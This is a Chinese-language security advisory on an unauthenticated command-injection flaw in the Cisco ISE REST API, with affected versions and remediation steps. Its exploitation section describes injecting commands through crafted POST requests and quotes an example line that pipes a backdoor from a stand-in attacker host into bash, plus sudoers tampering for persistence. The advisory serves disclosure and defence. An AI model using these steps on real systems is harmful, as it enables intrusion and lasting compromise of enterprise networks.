【漏洞通报】Cisco ISE API 未授权远程代码执行漏洞

漏洞情况

近期，火山信安实验室监测发现， Cisco Identity Services Engine (ISE) 的 REST API 接口存在高危安全漏洞（CVE-2025-20281，CVSS v3.1 评分 9.8/10）。该漏洞源于 ISE 未对特定 API 端点实施身份验证和授权检查，攻击者无需任何凭证即可通过构造恶意 HTTP 请求，直接在受影响设备上执行任意操作系统命令，导致完全系统控制。

0x01漏洞利用方式

攻击者可通过向 CSE ISE 管理接口的未公开 API 端点（如 /ers/config/networkdevice/ 或 /admin/API/mnt/Session/，具体路径需结合实际环境探测）发送特制 POST 请求，在请求体中注入恶意操作系统命令（如通过命令替换 $(...) 或分号拼接 ; 实现无交互执行）；一旦命令触发，攻击者可进一步利用该漏洞下载并执行恶意二进制文件（例如通过 curl http://attacker.com/backdoor | bash 植入后门），或直接修改系统关键配置文件（如 /etc/sudoers 赋予攻击者持久化特权），结合 ISE 在企业网络中通常具备的高权限（如管理核心交换机、无线控制器及认证策略），攻击者可横向渗透内网，窃取敏感数据（如用户凭证、网络拓扑）或破坏关键基础设施（如篡改访问控制策略导致网络瘫痪）。

0x02影响范围

• Cisco ISE 3.1.x 系列（如 3.1.0 - 3.1.3）
• Cisco ISE 3.2.x 系列（如 3.2.0 - 3.2.1）

0x03修复方案

1. 升级到安全版本Cisco ISE 3.1.4 及以上、Cisco ISE 3.2.2 及以上
2. 启用 Cisco ISE 多因素认证（MFA），强制管理员使用硬件令牌或生物识别登录
3. 定期审计 ISE 日志（/var/log/ise/ers.log），监控异常 API 请求（如高频访问、未知 IP）

来源自：广州盈基信息官网